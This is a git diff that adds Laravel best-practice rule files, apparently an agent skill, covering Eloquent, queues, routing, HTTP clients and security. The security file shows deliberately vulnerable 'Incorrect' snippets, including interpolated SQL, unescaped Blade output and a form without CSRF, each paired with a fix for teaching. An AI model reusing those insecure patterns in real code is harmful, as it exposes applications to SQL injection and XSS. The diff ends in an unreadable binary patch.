+Schema::create('orders', function (Blueprint $table) {
+    $table->id();
+    $table->foreignId('user_id')->index()->constrained();
+    $table->string('status')->index();
+    $table->timestamps();
+    $table->index(['status', 'created_at']);
+});
+```
+
+Add composite indexes for common query patterns (e.g., `WHERE status = ? ORDER BY created_at`).
+
+## Use `withCount()` for Counting Relations
+
+Never load entire collections just to count them.
+
+Incorrect:
+```php
+$posts = Post::all();
+foreach ($posts as $post) {
+    echo $post->comments->count();
+}
+```
+
+Correct:
+```php
+$posts = Post::withCount('comments')->get();
+foreach ($posts as $post) {
+    echo $post->comments_count;
+}
+```
+
+Conditional counting:
+
+```php
+$posts = Post::withCount([
+    'comments',
+    'comments as approved_comments_count' => function ($query) {
+        $query->where('approved', true);
+    },
+])->get();
+```
+
+## Use `cursor()` for Memory-Efficient Iteration
+
+For read-only iteration over large result sets, `cursor()` loads one record at a time via a PHP generator.
+
+Incorrect:
+```php
+$users = User::where('active', true)->get();
+```
+
+Correct:
+```php
+foreach (User::where('active', true)->cursor() as $user) {
+    ProcessUser::dispatch($user->id);
+}
+```
+
+Use `cursor()` for read-only iteration. Use `chunk()` / `chunkById()` when modifying records.
+
+## No Queries in Blade Templates
+
+Never execute queries in Blade templates. Pass data from controllers.
+
+Incorrect:
+```blade
+@foreach (User::all() as $user)
+    {{ $user->profile->name }}
+@endforeach
+```
+
+Correct:
+```php
+// Controller
+$users = User::with('profile')->get();
+return view('users.index', compact('users'));
+```
+
+```blade
+@foreach ($users as $user)
+    {{ $user->profile->name }}
+@endforeach
+```
\ No newline at end of file
diff --git a/.agents/skills/laravel-best-practices/rules/eloquent.md b/.agents/skills/laravel-best-practices/rules/eloquent.md
new file mode 100644
index 000000000..09cd66a05
--- /dev/null
+++ b/.agents/skills/laravel-best-practices/rules/eloquent.md
@@ -0,0 +1,148 @@
+# Eloquent Best Practices
+
+## Use Correct Relationship Types
+
+Use `hasMany`, `belongsTo`, `morphMany`, etc. with proper return type hints.
+
+```php
+public function comments(): HasMany
+{
+    return $this->hasMany(Comment::class);
+}
+
+public function author(): BelongsTo
+{
+    return $this->belongsTo(User::class, 'user_id');
+}
+```
+
+## Use Local Scopes for Reusable Queries
+
+Extract reusable query constraints into local scopes to avoid duplication.
+
+Incorrect:
+```php
+$active = User::where('verified', true)->whereNotNull('activated_at')->get();
+$articles = Article::whereHas('user', function ($q) {
+    $q->where('verified', true)->whereNotNull('activated_at');
+})->get();
+```
+
+Correct:
+```php
+public function scopeActive(Builder $query): Builder
+{
+    return $query->where('verified', true)->whereNotNull('activated_at');
+}
+
+// Usage
+$active = User::active()->get();
+$articles = Article::whereHas('user', fn ($q) => $q->active())->get();
+```
+
+## Apply Global Scopes Sparingly
+
+Global scopes silently modify every query on the model, making debugging difficult. Prefer local scopes and reserve global scopes for truly universal constraints like soft deletes or multi-tenancy.
+
+Incorrect (global scope for a conditional filter):
+```php
+class PublishedScope implements Scope
+{
+    public function apply(Builder $builder, Model $model): void
+    {
+        $builder->where('published', true);
+    }
+}
+// Now admin panels, reports, and background jobs all silently skip drafts
+```
+
+Correct (local scope you opt into):
+```php
+public function scopePublished(Builder $query): Builder
+{
+    return $query->where('published', true);
+}
+
+Post::published()->paginate(); // Explicit
+Post::paginate(); // Admin sees all
+```
+
+## Define Attribute Casts
+
+Use the `casts()` method (or `$casts` property following project convention) for automatic type conversion.
+
+```php
+protected function casts(): array
+{
+    return [
+        'is_active' => 'boolean',
+        'metadata' => 'array',
+        'total' => 'decimal:2',
+    ];
+}
+```
+
+## Cast Date Columns Properly
+
+Always cast date columns. Use Carbon instances in templates instead of formatting strings manually.
+
+Incorrect:
+```blade
+{{ Carbon::createFromFormat('Y-d-m H-i', $order->ordered_at)->toDateString() }}
+```
+
+Correct:
+```php
+protected function casts(): array
+{
+    return [
+        'ordered_at' => 'datetime',
+    ];
+}
+```
+
+```blade
+{{ $order->ordered_at->toDateString() }}
+{{ $order->ordered_at->format('m-d') }}
+```
+
+## Use `whereBelongsTo()` for Relationship Queries
+
+Cleaner than manually specifying foreign keys.
+
+Incorrect:
+```php
+Post::where('user_id', $user->id)->get();
+```
+
+Correct:
+```php
+Post::whereBelongsTo($user)->get();
+Post::whereBelongsTo($user, 'author')->get();
+```
+
+## Avoid Hardcoded Table Names in Queries
+
+Never use string literals for table names in raw queries, joins, or subqueries. Hardcoded table names make it impossible to find all places a model is used and break refactoring (e.g., renaming a table requires hunting through every raw string).
+
+Incorrect:
+```php
+DB::table('users')->where('active', true)->get();
+
+$query->join('companies', 'companies.id', '=', 'users.company_id');
+
+DB::select('SELECT * FROM orders WHERE status = ?', ['pending']);
+```
+
+Correct — reference the model's table:
+```php
+DB::table((new User)->getTable())->where('active', true)->get();
+
+// Even better — use Eloquent or the query builder instead of raw SQL
+User::where('active', true)->get();
+Order::where('status', 'pending')->get();
+```
+
+Prefer Eloquent queries and relationships over `DB::table()` whenever possible — they already reference the model's table. When `DB::table()` or raw joins are unavoidable, always use `(new Model)->getTable()` to keep the reference traceable.
+
+**Exception — migrations:** In migrations, hardcoded table names via `DB::table('settings')` are acceptable and preferred. Models change over time but migrations are frozen snapshots — referencing a model that is later renamed or deleted would break the migration.
\ No newline at end of file
diff --git a/.agents/skills/laravel-best-practices/rules/error-handling.md b/.agents/skills/laravel-best-practices/rules/error-handling.md
new file mode 100644
index 000000000..bb8e7a387
--- /dev/null
+++ b/.agents/skills/laravel-best-practices/rules/error-handling.md
@@ -0,0 +1,72 @@
+# Error Handling Best Practices
+
+## Exception Reporting and Rendering
+
+There are two valid approaches — choose one and apply it consistently across the project.
+
+**Co-location on the exception class** — keeps behavior alongside the exception definition, easier to find:
+
+```php
+class InvalidOrderException extends Exception
+{
+    public function report(): void { /* custom reporting */ }
+
+    public function render(Request $request): Response
+    {
+        return response()->view('errors.invalid-order', status: 422);
+    }
+}
+```
+
+**Centralized in `bootstrap/app.php`** — all exception handling in one place, easier to see the full picture:
+
+```php
+->withExceptions(function (Exceptions $exceptions) {
+    $exceptions->report(function (InvalidOrderException $e) { /* ... */ });
+    $exceptions->render(function (InvalidOrderException $e, Request $request) {
+        return response()->view('errors.invalid-order', status: 422);
+    });
+})
+```
+
+Check the existing codebase and follow whichever pattern is already established.
+
+## Use `ShouldntReport` for Exceptions That Should Never Log
+
+More discoverable than listing classes in `dontReport()`.
+
+```php
+class PodcastProcessingException extends Exception implements ShouldntReport {}
+```
+
+## Throttle High-Volume Exceptions
+
+A single failing integration can flood error tracking. Use `throttle()` to rate-limit per exception type.
+
+## Enable `dontReportDuplicates()`
+
+Prevents the same exception instance from being logged multiple times when `report($e)` is called in multiple catch blocks.
+
+## Force JSON Error Rendering for API Routes
+
+Laravel auto-detects `Accept: application/json` but API clients may not set it. Explicitly declare JSON rendering for API routes.
+
+```php
+$exceptions->shouldRenderJsonWhen(function (Request $request, Throwable $e) {
+    return $request->is('api/*') || $request->expectsJson();
+});
+```
+
+## Add Context to Exception Classes
+
+Attach structured data to exceptions at the source via a `context()` method — Laravel includes it automatically in the log entry.
+
+```php
+class InvalidOrderException extends Exception
+{
+    public function context(): array
+    {
+        return ['order_id' => $this->orderId];
+    }
+}
+```
\ No newline at end of file
diff --git a/.agents/skills/laravel-best-practices/rules/events-notifications.md b/.agents/skills/laravel-best-practices/rules/events-notifications.md
new file mode 100644
index 000000000..bc43f1997
--- /dev/null
+++ b/.agents/skills/laravel-best-practices/rules/events-notifications.md
@@ -0,0 +1,48 @@
+# Events & Notifications Best Practices
+
+## Rely on Event Discovery
+
+Laravel auto-discovers listeners by reading `handle(EventType $event)` type-hints. No manual registration needed in `AppServiceProvider`.
+
+## Run `event:cache` in Production Deploy
+
+Event discovery scans the filesystem per-request in dev. Cache it in production: `php artisan optimize` or `php artisan event:cache`.
+
+## Use `ShouldDispatchAfterCommit` Inside Transactions
+
+Without it, a queued listener may process before the DB transaction commits, reading data that doesn't exist yet.
+
+```php
+class OrderShipped implements ShouldDispatchAfterCommit {}
+```
+
+## Always Queue Notifications
+
+Notifications often hit external APIs (email, SMS, Slack). Without `ShouldQueue`, they block the HTTP response.
+
+```php
+class InvoicePaid extends Notification implements ShouldQueue
+{
+    use Queueable;
+}
+```
+
+## Use `afterCommit()` on Notifications in Transactions
+
+Same race condition as events — the queued notification job may run before the transaction commits.
+
+## Route Notification Channels to Dedicated Queues
+
+Mail and database notifications have different priorities. Use `viaQueues()` to route them to separate queues.
+
+## Use On-Demand Notifications for Non-User Recipients
+
+Avoid creating dummy models to send notifications to arbitrary addresses.
+
+```php
+Notification::route('mail', 'admin@example.com')->notify(new SystemAlert());
+```
+
+## Implement `HasLocalePreference` on Notifiable Models
+
+Laravel automatically uses the user's preferred locale for all notifications and mailables — no per-call `locale()` needed.
\ No newline at end of file
diff --git a/.agents/skills/laravel-best-practices/rules/http-client.md b/.agents/skills/laravel-best-practices/rules/http-client.md
new file mode 100644
index 000000000..0a7876ed3
--- /dev/null
+++ b/.agents/skills/laravel-best-practices/rules/http-client.md
@@ -0,0 +1,160 @@
+# HTTP Client Best Practices
+
+## Always Set Explicit Timeouts
+
+The default timeout is 30 seconds — too long for most API calls. Always set explicit `timeout` and `connectTimeout` to fail fast.
+
+Incorrect:
+```php
+$response = Http::get('https://api.example.com/users');
+```
+
+Correct:
+```php
+$response = Http::timeout(5)
+    ->connectTimeout(3)
+    ->get('https://api.example.com/users');
+```
+
+For service-specific clients, define timeouts in a macro:
+
+```php
+Http::macro('github', function () {
+    return Http::baseUrl('https://api.github.com')
+        ->timeout(10)
+        ->connectTimeout(3)
+        ->withToken(config('services.github.token'));
+});
+
+$response = Http::github()->get('/repos/laravel/framework');
+```
+
+## Use Retry with Backoff for External APIs
+
+External APIs have transient failures. Use `retry()` with increasing delays.
+
+Incorrect:
+```php
+$response = Http::post('https://api.stripe.com/v1/charges', $data);
+
+if ($response->failed()) {
+    throw new PaymentFailedException('Charge failed');
+}
+```
+
+Correct:
+```php
+$response = Http::retry([100, 500, 1000])
+    ->timeout(10)
+    ->post('https://api.stripe.com/v1/charges', $data);
+```
+
+Only retry on specific errors:
+
+```php
+$response = Http::retry(3, 100, function (Exception $exception, PendingRequest $request) {
+    return $exception instanceof ConnectionException
+        || ($exception instanceof RequestException && $exception->response->serverError());
+})->post('https://api.example.com/data');
+```
+
+## Handle Errors Explicitly
+
+The HTTP Client does not throw on 4xx/5xx by default. Always check status or use `throw()`.
+
+Incorrect:
+```php
+$response = Http::get('https://api.example.com/users/1');
+$user = $response->json(); // Could be an error body
+```
+
+Correct:
+```php
+$response = Http::timeout(5)
+    ->get('https://api.example.com/users/1')
+    ->throw();
+
+$user = $response->json();
+```
+
+For graceful degradation:
+
+```php
+$response = Http::get('https://api.example.com/users/1');
+
+if ($response->successful()) {
+    return $response->json();
+}
+
+if ($response->notFound()) {
+    return null;
+}
+
+$response->throw();
+```
+
+## Use Request Pooling for Concurrent Requests
+
+When making multiple independent API calls, use `Http::pool()` instead of sequential calls.
+
+Incorrect:
+```php
+$users = Http::get('https://api.example.com/users')->json();
+$posts = Http::get('https://api.example.com/posts')->json();
+$comments = Http::get('https://api.example.com/comments')->json();
+```
+
+Correct:
+```php
+use Illuminate\Http\Client\Pool;
+
+$responses = Http::pool(fn (Pool $pool) => [
+    $pool->as('users')->get('https://api.example.com/users'),
+    $pool->as('posts')->get('https://api.example.com/posts'),
+    $pool->as('comments')->get('https://api.example.com/comments'),
+]);
+
+$users = $responses['users']->json();
+$posts = $responses['posts']->json();
+```
+
+## Fake HTTP Calls in Tests
+
+Never make real HTTP requests in tests. Use `Http::fake()` and `preventStrayRequests()`.
+
+Incorrect:
+```php
+it('syncs user from API', function () {
+    $service = new UserSyncService;
+    $service->sync(1); // Hits the real API
+});
+```
+
+Correct:
+```php
+it('syncs user from API', function () {
+    Http::preventStrayRequests();
+
+    Http::fake([
+        'api.example.com/users/1' => Http::response([
+            'name' => 'John Doe',
+            'email' => 'john@example.com',
+        ]),
+    ]);
+
+    $service = new UserSyncService;
+    $service->sync(1);
+
+    Http::assertSent(function (Request $request) {
+        return $request->url() === 'https://api.example.com/users/1';
+    });
+});
+```
+
+Test failure scenarios too:
+
+```php
+Http::fake([
+    'api.example.com/*' => Http::failedConnection(),
+]);
+```
\ No newline at end of file
diff --git a/.agents/skills/laravel-best-practices/rules/mail.md b/.agents/skills/laravel-best-practices/rules/mail.md
new file mode 100644
index 000000000..c7f67966e
--- /dev/null
+++ b/.agents/skills/laravel-best-practices/rules/mail.md
@@ -0,0 +1,27 @@
+# Mail Best Practices
+
+## Implement `ShouldQueue` on the Mailable Class
+
+Makes queueing the default regardless of how the mailable is dispatched. No need to remember `Mail::queue()` at every call site — `Mail::send()` also queues it.
+
+## Use `afterCommit()` on Mailables Inside Transactions
+
+A queued mailable dispatched inside a transaction may process before the commit. Use `$this->afterCommit()` in the constructor.
+
+## Use `assertQueued()` Not `assertSent()` for Queued Mailables
+
+`Mail::assertSent()` only catches synchronous mail. Queued mailables silently pass `assertSent`, giving false confidence.
+
+Incorrect: `Mail::assertSent(OrderShipped::class);` when mailable implements `ShouldQueue`.
+
+Correct: `Mail::assertQueued(OrderShipped::class);`
+
+## Use Markdown Mailables for Transactional Emails
+
+Markdown mailables auto-generate both HTML and plain-text versions, use responsive components, and allow global style customization. Generate with `--markdown` flag.
+
+## Separate Content Tests from Sending Tests
+
+Content tests: instantiate the mailable directly, call `assertSeeInHtml()`.
+Sending tests: use `Mail::fake()` and `assertSent()`/`assertQueued()`.
+Don't mix them — it conflates concerns and makes tests brittle.
\ No newline at end of file
diff --git a/.agents/skills/laravel-best-practices/rules/migrations.md b/.agents/skills/laravel-best-practices/rules/migrations.md
new file mode 100644
index 000000000..de25aa39c
--- /dev/null
+++ b/.agents/skills/laravel-best-practices/rules/migrations.md
@@ -0,0 +1,121 @@
+# Migration Best Practices
+
+## Generate Migrations with Artisan
+
+Always use `php artisan make:migration` for consistent naming and timestamps.
+
+Incorrect (manually created file):
+```php
+// database/migrations/posts_migration.php  ← wrong naming, no timestamp
+```
+
+Correct (Artisan-generated):
+```bash
+php artisan make:migration create_posts_table
+php artisan make:migration add_slug_to_posts_table
+```
+
+## Use `constrained()` for Foreign Keys
+
+Automatic naming and referential integrity.
+
+```php
+$table->foreignId('user_id')->constrained()->cascadeOnDelete();
+
+// Non-standard names
+$table->foreignId('author_id')->constrained('users');
+```
+
+## Never Modify Deployed Migrations
+
+Once a migration has run in production, treat it as immutable. Create a new migration to change the table.
+
+Incorrect (editing a deployed migration):
+```php
+// 2024_01_01_create_posts_table.php — already in production
+$table->string('slug')->unique(); // ← added after deployment
+```
+
+Correct (new migration to alter):
+```php
+// 2024_03_15_add_slug_to_posts_table.php
+Schema::table('posts', function (Blueprint $table) {
+    $table->string('slug')->unique()->after('title');
+});
+```
+
+## Add Indexes in the Migration
+
+Add indexes when creating the table, not as an afterthought. Columns used in `WHERE`, `ORDER BY`, and `JOIN` clauses need indexes.
+
+Incorrect:
+```php
+Schema::create('orders', function (Blueprint $table) {
+    $table->id();
+    $table->foreignId('user_id')->constrained();
+    $table->string('status');
+    $table->timestamps();
+});
+```
+
+Correct:
+```php
+Schema::create('orders', function (Blueprint $table) {
+    $table->id();
+    $table->foreignId('user_id')->constrained()->index();
+    $table->string('status')->index();
+    $table->timestamp('shipped_at')->nullable()->index();
+    $table->timestamps();
+});
+```
+
+## Mirror Defaults in Model `$attributes`
+
+When a column has a database default, mirror it in the model so new instances have correct values before saving.
+
+```php
+// Migration
+$table->string('status')->default('pending');
+
+// Model
+protected $attributes = [
+    'status' => 'pending',
+];
+```
+
+## Write Reversible `down()` Methods by Default
+
+Implement `down()` for schema changes that can be safely reversed so `migrate:rollback` works in CI and failed deployments.
+
+```php
+public function down(): void
+{
+    Schema::table('posts', function (Blueprint $table) {
+        $table->dropColumn('slug');
+    });
+}
+```
+
+For intentionally irreversible migrations (e.g., destructive data backfills), leave a clear comment and require a forward fix migration instead of pretending rollback is supported.
+
+## Keep Migrations Focused
+
+One concern per migration. Never mix DDL (schema changes) and DML (data manipulation).
+
+Incorrect (partial failure creates unrecoverable state):
+```php
+public function up(): void
+{
+    Schema::create('settings', function (Blueprint $table) { ... });
+    DB::table('settings')->insert(['key' => 'version', 'value' => '1.0']);
+}
+```
+
+Correct (separate migrations):
+```php
+// Migration 1: create_settings_table
+Schema::create('settings', function (Blueprint $table) { ... });
+
+// Migration 2: seed_default_settings
+DB::table('settings')->insert(['key' => 'version', 'value' => '1.0']);
+```
\ No newline at end of file
diff --git a/.agents/skills/laravel-best-practices/rules/queue-jobs.md b/.agents/skills/laravel-best-practices/rules/queue-jobs.md
new file mode 100644
index 000000000..d4575aac0
--- /dev/null
+++ b/.agents/skills/laravel-best-practices/rules/queue-jobs.md
@@ -0,0 +1,146 @@
+# Queue & Job Best Practices
+
+## Set `retry_after` Greater Than `timeout`
+
+If `retry_after` is shorter than the job's `timeout`, the queue worker re-dispatches the job while it's still running, causing duplicate execution.
+
+Incorrect (`retry_after` ≤ `timeout`):
+```php
+class ProcessReport implements ShouldQueue
+{
+    public $timeout = 120;
+}
+
+// config/queue.php — retry_after: 90 ← job retried while still running!
+```
+
+Correct (`retry_after` > `timeout`):
+```php
+class ProcessReport implements ShouldQueue
+{
+    public $timeout = 120;
+}
+
+// config/queue.php — retry_after: 180 ← safely longer than any job timeout
+```
+
+## Use Exponential Backoff
+
+Use progressively longer delays between retries to avoid hammering failing services.
+
+Incorrect (fixed retry interval):
+```php
+class SyncWithStripe implements ShouldQueue
+{
+    public $tries = 3;
+    // Default: retries immediately, overwhelming the API
+}
+```
+
+Correct (exponential backoff):
+```php
+class SyncWithStripe implements ShouldQueue
+{
+    public $tries = 3;
+    public $backoff = [1, 5, 10];
+}
+```
+
+## Implement `ShouldBeUnique`
+
+Prevent duplicate job processing.
+
+```php
+class GenerateInvoice implements ShouldQueue, ShouldBeUnique
+{
+    public function uniqueId(): string
+    {
+        return $this->order->id;
+    }
+
+    public $uniqueFor = 3600;
+}
+```
+
+## Always Implement `failed()`
+
+Handle errors explicitly — don't rely on silent failure.
+
+```php
+public function failed(?Throwable $exception): void
+{
+    $this->podcast->update(['status' => 'failed']);
+    Log::error('Processing failed', ['id' => $this->podcast->id, 'error' => $exception->getMessage()]);
+}
+```
+
+## Rate Limit External API Calls in Jobs
+
+Use `RateLimited` middleware to throttle jobs calling third-party APIs.
+
+```php
+public function middleware(): array
+{
+    return [new RateLimited('external-api')];
+}
+```
+
+## Batch Related Jobs
+
+Use `Bus::batch()` when jobs should succeed or fail together.
+
+```php
+Bus::batch([
+    new ImportCsvChunk($chunk1),
+    new ImportCsvChunk($chunk2),
+])
+->then(fn (Batch $batch) => Notification::send($user, new ImportComplete))
+->catch(fn (Batch $batch, Throwable $e) => Log::error('Batch failed'))
+->dispatch();
+```
+
+## `retryUntil()` Needs `$tries = 0`
+
+When using time-based retry limits, set `$tries = 0` to avoid premature failure.
+
+```php
+public $tries = 0;
+
+public function retryUntil(): DateTime
+{
+    return now()->addHours(4);
+}
+```
+
+## Use `WithoutOverlapping::untilProcessing()`
+
+Prevents concurrent execution while allowing new instances to queue.
+
+```php
+public function middleware(): array
+{
+    return [new WithoutOverlapping($this->product->id)->untilProcessing()];
+}
+```
+
+Without `untilProcessing()`, the lock extends through queue wait time. With it, the lock releases when processing starts.
+
+## Use Horizon for Complex Queue Scenarios
+
+Use Laravel Horizon when you need monitoring, auto-scaling, failure tracking, or multiple queues with different priorities.
+
+```php
+// config/horizon.php
+'environments' => [
+    'production' => [
+        'supervisor-1' => [
+            'connection' => 'redis',
+            'queue' => ['high', 'default', 'low'],
+            'balance' => 'auto',
+            'minProcesses' => 1,
+            'maxProcesses' => 10,
+            'tries' => 3,
+        ],
+    ],
+],
+```
\ No newline at end of file
diff --git a/.agents/skills/laravel-best-practices/rules/routing.md b/.agents/skills/laravel-best-practices/rules/routing.md
new file mode 100644
index 000000000..e288375d7
--- /dev/null
+++ b/.agents/skills/laravel-best-practices/rules/routing.md
@@ -0,0 +1,98 @@
+# Routing & Controllers Best Practices
+
+## Use Implicit Route Model Binding
+
+Let Laravel resolve models automatically from route parameters.
+
+Incorrect:
+```php
+public function show(int $id)
+{
+    $post = Post::findOrFail($id);
+}
+```
+
+Correct:
+```php
+public function show(Post $post)
+{
+    return view('posts.show', ['post' => $post]);
+}
+```
+
+## Use Scoped Bindings for Nested Resources
+
+Enforce parent-child relationships automatically.
+
+```php
+Route::get('/users/{user}/posts/{post}', function (User $user, Post $post) {
+    // $post is automatically scoped to $user
+})->scopeBindings();
+```
+
+## Use Resource Controllers
+
+Use `Route::resource()` or `apiResource()` for RESTful endpoints.
+
+```php
+Route::resource('posts', PostController::class);
+Route::apiResource('api/posts', Api\PostController::class);
+```
+
+## Keep Controllers Thin
+
+Aim for under 10 lines per method. Extract business logic to action or service classes.
+
+Incorrect:
+```php
+public function store(Request $request)
+{
+    $validated = $request->validate([...]);
+    if ($request->hasFile('image')) {
+        $request->file('image')->move(public_path('images'));
+    }
+    $post = Post::create($validated);
+    $post->tags()->sync($validated['tags']);
+    event(new PostCreated($post));
+    return redirect()->route('posts.show', $post);
+}
+```
+
+Correct:
+```php
+public function store(StorePostRequest $request, CreatePostAction $create)
+{
+    $post = $create->execute($request->validated());
+
+    return redirect()->route('posts.show', $post);
+}
+```
+
+## Type-Hint Form Requests
+
+Type-hinting Form Requests triggers automatic validation and authorization before the method executes.
+
+Incorrect:
+```php
+public function store(Request $request): RedirectResponse
+{
+    $validated = $request->validate([
+        'title' => ['required', 'max:255'],
+        'body' => ['required'],
+    ]);
+
+    Post::create($validated);
+
+    return redirect()->route('posts.index');
+}
+```
+
+Correct:
+```php
+public function store(StorePostRequest $request): RedirectResponse
+{
+    Post::create($request->validated());
+
+    return redirect()->route('posts.index');
+}
+```
\ No newline at end of file
diff --git a/.agents/skills/laravel-best-practices/rules/scheduling.md b/.agents/skills/laravel-best-practices/rules/scheduling.md
new file mode 100644
index 000000000..dfaefa26f
--- /dev/null
+++ b/.agents/skills/laravel-best-practices/rules/scheduling.md
@@ -0,0 +1,39 @@
+# Task Scheduling Best Practices
+
+## Use `withoutOverlapping()` on Variable-Duration Tasks
+
+Without it, a long-running task spawns a second instance on the next tick, causing double-processing or resource exhaustion.
+
+## Use `onOneServer()` on Multi-Server Deployments
+
+Without it, every server runs the same task simultaneously. Requires a shared cache driver (Redis, database, Memcached).
+
+## Use `runInBackground()` for Concurrent Long Tasks
+
+By default, tasks at the same tick run sequentially. A slow first task delays all subsequent ones. `runInBackground()` runs them as separate processes.
+
+## Use `environments()` to Restrict Tasks
+
+Prevent accidental execution of production-only tasks (billing, reporting) on staging.
+
+```php
+Schedule::command('billing:charge')->monthly()->environments(['production']);
+```
+
+## Use `takeUntilTimeout()` for Time-Bounded Processing
+
+A task running every 15 minutes that processes an unbounded cursor can overlap with the next run. Bound execution time.
+
+## Use Schedule Groups for Shared Configuration
+
+Avoid repeating `->onOneServer()->timezone('America/New_York')` across many tasks.
+
+```php
+Schedule::daily()
+    ->onOneServer()
+    ->timezone('America/New_York')
+    ->group(function () {
+        Schedule::command('emails:send --force');
+        Schedule::command('emails:prune');
+    });
+```
\ No newline at end of file
diff --git a/.agents/skills/laravel-best-practices/rules/security.md b/.agents/skills/laravel-best-practices/rules/security.md
new file mode 100644
index 000000000..524d47e61
--- /dev/null
+++ b/.agents/skills/laravel-best-practices/rules/security.md
@@ -0,0 +1,198 @@
+# Security Best Practices
+
+## Mass Assignment Protection
+
+Every model must define `$fillable` (whitelist) or `$guarded` (blacklist).
+
+Incorrect:
+```php
+class User extends Model
+{
+    protected $guarded = []; // All fields are mass assignable
+}
+```
+
+Correct:
+```php
+class User extends Model
+{
+    protected $fillable = [
+        'name',
+        'email',
+        'password',
+    ];
+}
+```
+
+Never use `$guarded = []` on models that accept user input.
+
+## Authorize Every Action
+
+Use policies or gates in controllers. Never skip authorization.
+
+Incorrect:
+```php
+public function update(Request $request, Post $post)
+{
+    $post->update($request->validated());
+}
+```
+
+Correct:
+```php
+public function update(UpdatePostRequest $request, Post $post)
+{
+    Gate::authorize('update', $post);
+
+    $post->update($request->validated());
+}
+```
+
+Or via Form Request:
+
+```php
+public function authorize(): bool
+{
+    return $this->user()->can('update', $this->route('post'));
+}
+```
+
+## Prevent SQL Injection
+
+Always use parameter binding. Never interpolate user input into queries.
+
+Incorrect:
+```php
+DB::select("SELECT * FROM users WHERE name = '{$request->name}'");
+```
+
+Correct:
+```php
+User::where('name', $request->name)->get();
+
+// Raw expressions with bindings
+User::whereRaw('LOWER(name) = ?', [strtolower($request->name)])->get();
+```
+
+## Escape Output to Prevent XSS
+
+Use `{{ }}` for HTML escaping. Only use `{!! !!}` for trusted, pre-sanitized content.
+
+Incorrect:
+```blade
+{!! $user->bio !!}
+```
+
+Correct:
+```blade
+{{ $user->bio }}
+```
+
+## CSRF Protection
+
+Include `@csrf` in all POST/PUT/DELETE Blade forms. Not needed in Inertia.
+
+Incorrect:
+```blade
+<form method="POST" action="/posts">
+    <input type="text" name="title">
+</form>
+```
+
+Correct:
+```blade
+<form method="POST" action="/posts">
+    @csrf
+    <input type="text" name="title">
+</form>
+```
+
+## Rate Limit Auth and API Routes
+
+Apply `throttle` middleware to authentication and API routes.
+
+```php
+RateLimiter::for('login', function (Request $request) {
+    return Limit::perMinute(5)->by($request->ip());
+});
+
+Route::post('/login', LoginController::class)->middleware('throttle:login');
+```
+
+## Validate File Uploads
+
+Validate MIME type, extension, and size. Never trust client-provided filenames.
+
+```php
+public function rules(): array
+{
+    return [
+        'avatar' => ['required', 'image', 'mimes:jpg,jpeg,png,webp', 'max:2048'],
+    ];
+}
+```
+
+Store with generated filenames:
+
+```php
+$path = $request->file('avatar')->store('avatars', 'public');
+```
+
+## Keep Secrets Out of Code
+
+Never commit `.env`. Access secrets via `config()` only.
+
+Incorrect:
+```php
+$key = env('API_KEY');
+```
+
+Correct:
+```php
+// config/services.php
+'api_key' => env('API_KEY'),
+
+// In application code
+$key = config('services.api_key');
+```
+
+## Audit Dependencies
+
+Run `composer audit` periodically to check for known vulnerabilities in dependencies. Automate this in CI to catch issues before deployment.
+
+```bash
+composer audit
+```
+
+## Encrypt Sensitive Database Fields
+
+Use `encrypted` cast for API keys/tokens and mark the attribute as `hidden`.
+
+Incorrect:
+```php
+class Integration extends Model
+{
+    protected function casts(): array
+    {
+        return [
+            'api_key' => 'string',
+        ];
+    }
+}
+```
+
+Correct:
+```php
+class Integration extends Model
+{
+    protected $hidden = ['api_key', 'api_secret'];
+
+    protected function casts(): array
+    {
+        return [
+            'api_key' => 'encrypted',
+            'api_secret' => 'encrypted',
+        ];
+    }
+}
+```
\ No newline at end of file
diff --git a/.agents/skills/laravel-best-practices/rules/style.md b/.agents/skills/laravel-best-practices/rules/style.md
new file mode 100644
index 0000000000000000000000000000000000000000..db689bf774d1763ac3ec520a3874015f5421ff5b
GIT binary patch
literal 4443
zcmb7H|8g6*5$@mj6gxJXBU_TPGV!!SM{H%Ls*_r-YD&%@j)w&AKoK^0I0HCRY@C@s
zM4zxv(r<yg<Izbwt!5-07W)gki*FZ?X=aL@EW9#>qc3Rg4_YS4<HvMmv^INsDXiE@
zO|QgO75824B>6<&Z-l2$9V!-oHYUfv=K_C|PowZt|LcB75;$1eTUe78Vh&a+E%<YJ
zX}!v{Jnk<$RChv#nroB8&r=O|PTC;E9}ZvOyA>-f!B^_a3OyuOh!1j+3CF~xh&C6Q
z*=`XQmT8HzBMo|P)XsSFwYJu8q05a}Nq8>Un^s}fxWXTc+D!ClW^}bJz<hLNNQI$o
zI8h<C!LzOOV&Rq7vg_00gbcT?jFsxXpbzrE8k=xNUB9K}Lggp&r%M;Nq35-!{4q?O
zlen|<u7a>?`D<s72cf<48_JD$tb)((#%^Qw3z2!Xi$^(9M=cc^uchCFQpykkJ*yLR
zFa4#~!2^6QMEC~x8(~$Qixd7{9cuSI9J#EZGFC)OU$BP@(d<AK@}VW%Gn|uLy3DGQ
zogLOS!zbxQPw(ow0wEV(z%9uCb@d+NpUbwXIF$}3>4gwP={HL5A^SnD#A?)(C5LRZ
zR@zG|^YKcHT#n048H9Q7>X){{QHr&?hq_KiVE^8jd(B0!WswWps*3d4DH&@1R8(75
z(o_>v@X2ovWz1l+2v>~J<HpK0?(-bchRgI?iaaD|eki<nVCZ-w?aG8Z*D$qc0hl-f
z1_yLGm(C#_lL=DZPcx)69mKQ8jSh|3dscp|r1PVxtM><^>HjOLin4++uISp>Q7sc=
zww6}<$`&|bt}L=XnXE+ip&z}g_gV`3HWN5EPEweC&DDJI?qyj{CR+efKb>jeTy0sD
zWtYI5qv?KwV!+7*dZa^2FYxC)TK@TN*ocD0=F&btK-5a%Wxf!e#ktaJd!wnwhV#M0
z|0*OpGDbs1S7xm&uSe55UhMTw=n7u9VGYd&_0x8mxwqVDzMxBM#erT(T>><cr0GPZ
zH9G}Es0weFLv9n{->Yi70@@Er6gkS%swHiLEM*)?2zc&R!b$)u{^0DPCWn-5getf^
zqwL-7)#&%+#9FdML00VP=EV)It0I7c8`GuUi-V&wR=MBE?KnxI<BtCIkAD*GbM!BG
zv&NAN9|)6)S#wm)4%edAJV}<zC2n(ac1GV8nXz0*Nzdu(o-W9F>kV45w0(RotSq(2
z5JBRcjqs-zn!;f43?h8rSf*Nmx8L*f!4K&P%HqkB0gWjgkH;zaLPU;y;I-Mt_EVJK
z5225`U*USQfgjQV7uB<botu5;+T7d8gx!QCZcJSl!k$)J<r_EHhmP&w!(s(k=UVug
zZLlILNpclq2NzKlF}NXLWKb3&&Mj+W2@Si{@`1b+g#%$5_x?j{t#p+Rkvc{f7PhA$
